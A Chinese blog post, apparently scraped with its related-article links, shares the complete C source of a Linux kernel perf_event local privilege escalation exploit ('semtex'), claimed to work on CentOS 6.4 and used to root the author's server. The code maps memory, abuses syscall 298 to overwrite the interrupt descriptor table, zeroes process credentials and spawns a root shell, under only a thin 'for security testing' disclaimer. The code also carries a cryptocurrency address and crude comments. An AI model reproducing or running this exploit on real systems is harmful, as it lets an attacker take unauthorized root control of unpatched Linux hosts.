Centos/CentOS 6.4 linux内核2.6.3.2本地提权exp代码

jincon 发表于 2014-05-31 08:25:00 发表在: 代码审计

最近我接手的一台centos 服务器的,被黑客攻击,直接获取到root权限,牛逼,通过分析,大约是通过

mysql+exp提权获得root权限。下面分享下。

具体大家可以去测试。代码具有非常强的攻击性,请用于安全测试,否则后果自担。

http://www.jincon.com/archives/187/

/*

 * linux 2.6.37-3.x.x x86_64, ~100 LOC

 * gcc-4.6 -O2 semtex.c && ./a.out

 * 2010 sd@fucksheep.org, salut!

 *

 * update may 2013:

 * seems like centos 2.6.32 backported the perf bug, lol.

 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.

 */

#define _GNU_SOURCE 1

#include <stdint.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/mman.h>

#include <syscall.h>

#include <stdint.h>

#include <assert.h>

#define BASE  0x380000000

#define SIZE  0x010000000

#define KSIZE  0x2000000

#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {

  int i,j,k;

  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };

  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));

  uint64_t kbase = ((uint64_t)current)>>36;

  uint32_t *fixptr = (void*) AB(1);

  *fixptr = -1;

  for (i=0; i<4000; i+=4) {

    uint64_t *p = (void *)&current[i];

    uint32_t *t = (void*) p[0];

    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;

    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)

      if (((uint32_t*)uids)[k] != t[j+k]) goto next;

      for (i = 0; i < 8; i++) t[j+i] = 0;

      for (i = 0; i < 10; i++) t[j+9+i] = -1;

      return;

next:;    }

  }

}

void sheep(uint32_t off) {

  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };

  int fd = syscall(298, buf, 0, -1, -1, 0);

  assert(!close(fd));

}

int  main() {

  uint64_t  u,g,needle, kbase, *p; uint8_t *code;

  uint32_t *map, j = 5;

  int i;

  struct {

    uint16_t limit;

    uint64_t addr;

  } __attribute__((packed)) idt;

  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);

  memset(map, 0, SIZE);

  sheep(-1); sheep(-2);

  for (i = 0; i < SIZE/4; i++) if (map[i]) {

    assert(map[i+1]);

    break;

  }

  assert(i<SIZE/4);

  asm ("sidt %0" : "=m" (idt));

  kbase = idt.addr & 0xff000000;

  u = getuid(); g = getgid();

  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);

  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);

  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",

    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);

  setresuid(u,u,u); setresgid(g,g,g);

  while (j--) {

    needle = AB(j+1);

    assert(p = memmem(code, 1024, &needle, 8));

    if (!p) continue;

    *p = j?((g<<32)|u):(idt.addr + 0x48);

  }

  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);

  asm("int $0x4");  assert(!setuid(0));

  return execl("/bin/bash", "-sh", NULL);

}

LInux 安全测试 2的更多相关文章

  1. Kali linux渗透测试常用工具汇总1

    1.ProxyChains 简介:代理工具.支持HTTP/SOCKS4/SOCK5的代理服务器,允许TCP/DNS通过代理隧道. 应用场景:通过代理服务器上网. 配置:/etc/proxychains ...

  2. Kali linux渗透测试的艺术 思维导图

    Kali Linux是一个全面的渗透测试平台,其自带的高级工具可以用来识别.检测和利用目标网络中未被发现的漏洞.借助于Kali Linux,你可以根据已定义的业务目标和预定的测试计划,应用合适的测试方 ...

  3. linux下测试磁盘的读写IO速度-简易方法

    linux下测试磁盘的读写IO速度-简易方法 参考资料:https://blog.csdn.net/zqtsx/article/details/25487185 一:使用hdparm命令 这是一个是用 ...

  4. 【Linux】测试环境如何搭建?

    [Linux]测试环境如何搭建? (该文档所在我的百度网盘位置: ) 通常面试会问到会不会搭建测试环境?到底啥是测试环境搭建呢,其实测试环境没有想像的那么高大上,弄个 tomcat,把测试的 war ...

  5. Kail Linux渗透测试教程之免杀Payload生成工具Veil

    Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具——Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...

  6. Kail Linux渗透测试教程之在Metasploit中扫描

    Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络 ...

  7. Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap

    Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap 网络扫描和嗅探工具——Nmap Nmap也就网络映射器(Network Mapper),是一个免费开放的网络扫描和嗅探工具.该工具可以扫描 ...

  8. Kail Linux渗透测试教程之ARP侦查Netdiscover端口扫描Zenmap与黑暗搜索引擎Shodan

    Kail Linux渗透测试教程之ARP侦查Netdiscover端口扫描Zenmap与黑暗搜索引擎Shodan ARP侦查工具——Netdiscover Netdiscover是一个主动/被动的AR ...

  9. Kail Linux渗透测试教程之Recon-NG框架

    Kail Linux渗透测试教程之Recon-NG框架 信息收集 信息收集是网络攻击最重要的阶段之一.要想进行渗透攻击,就需要收集目标的各类信息.收集到的信息越多,攻击成功的概率也就越大.本章将介绍信 ...

  10. linux上测试磁盘IO速度

    运维工作,经常要测试服务器硬件性能,以此来判断是否存在性能瓶颈. 下面介绍在linux上测试磁盘IO速度的工具: 1.hdparm CentOS中,安装的两种方法: 1) yum安装. # yum i ...

随机推荐

  1. SQL Server之存储过程基础知识

    什么是存储过程呢?存储过程就是作为可执行对象存放在数据库中的一个或多个SQL命令. 通俗来讲:存储过程其实就是能完成一定操作的一组SQL语句. 那为什么要用存储过程呢?1.存储过程只在创造时进行编译, ...

  2. HDU1698 Just a Hook

    Description In the game of DotA, Pudge’s meat hook is actually the most horrible thing for most of t ...

  3. Jfreechart 乱码

    整个图标分成三部分chart   title,chart 的plot还有chart的   legend三个部分需要对他们分别设置字体就对了. 先看解决方法( 把这几个全部设置了,都搞定了就可以了): ...

  4. JSP业务逻辑层

    经典的三层架构:表示层.业务逻辑层和数据访问层 具体的区分方法 1:数据访问层:主要看你的数据层里面有没有包含逻辑处理,实际上他的各个函数主要完成各个对数据文件的操作.而不必管其他操作. 2:业务逻辑 ...

  5. hihoCoder 1195 高斯消元.一

    传送门 时间限制:10000ms 单点时限:1000ms 内存限制:256MB 描述 小Ho:喂不得了啦,那边便利店的薯片半价了! 小Hi:啥?! 小Ho:那边的便利店在打折促销啊. 小Hi:走走走, ...

  6. php验证是否是中文

    header("content-type:text/html;charset=utf-8");$str = "编";if (preg_match("/ ...

  7. fork Bomb

    类Unix ;(){:|:&};: windows %0|%0

  8. hdu 1003 Max Sum(动态规划)

    解题思路: 本题在给定的集合中找到最大的子集合[子集合:集合的元素的总和,是所有子集合中的最大解.] 结果输出: 最大的子集合的所有元素的和,子集合在集合中的范围区间. 依次对元素相加,存到一个 su ...

  9. java可变参数例子:求学生成绩信息,不确定课程数

    可变参数特点: 1)...只能出现在参数列表的最后2)...位于变量类型和变量名之间3)调用可变参数的方法时,编译器为该可变参数隐含创建一个数组,在方法体中以数组的形式访问可变参数 //可变参数也可用 ...

  10. 基于SSH2框架Struts2拦截器的登录验证实现(转)

        大象在这里假设你已经弄清楚了Struts2拦截器的基本概念,可以进入实际运用了.那么我们在之前的基础上只需要做下小小的改变,就可以使用Struts2的拦截器机制实现登录的验证.     修改数 ...